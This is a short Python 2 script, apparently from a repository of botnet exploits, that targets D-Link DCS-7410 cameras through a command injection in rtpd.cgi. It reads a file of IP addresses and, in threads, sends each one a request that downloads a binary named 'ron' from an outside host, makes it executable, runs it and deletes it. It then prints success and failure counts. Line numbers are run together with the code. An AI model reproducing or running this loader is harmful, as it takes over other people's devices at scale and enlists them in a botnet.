Path: blob/master/Botnets/Exploits/DCS-7410/dlink_dcs.py
5038 views
# D-LINK DCS-7410 "RonBurgundy" Vulnerability1import os2import sys3import time4import threading5import requests67ips = open(sys.argv[1], "r").read().splitlines()89headers = {10"User-Agent" : "Y0uArEb1GgAY/1.0",11}12f = 013s = 01415def exploit(ron):16try:17global s18url = 'http://'+ ron +'/cgi-bin/rtpd.cgi?wget&http:/b4.ck.do.or/ron;chmod&777&ron;./ron;rm&-rf&ron'19requests.get(url, headers=headers, timeout=5)20s += 121except:22global f23f +=124pass2526print 'Fail | Success'27def main(burgundy):28sys.stdout.flush()29sys.stdout.write('\r\x1b[0m|\x1b[0;32m'+str(f)+' \x1b[0m|\x1b[0;33m' + str(s) + ' \x1b[0m|\x1b[1;34m')30sys.stdout.flush()31exploit(burgundy)323334for lel in ips:35t = threading.Thread(target=main, args = (lel,))36t.start()3738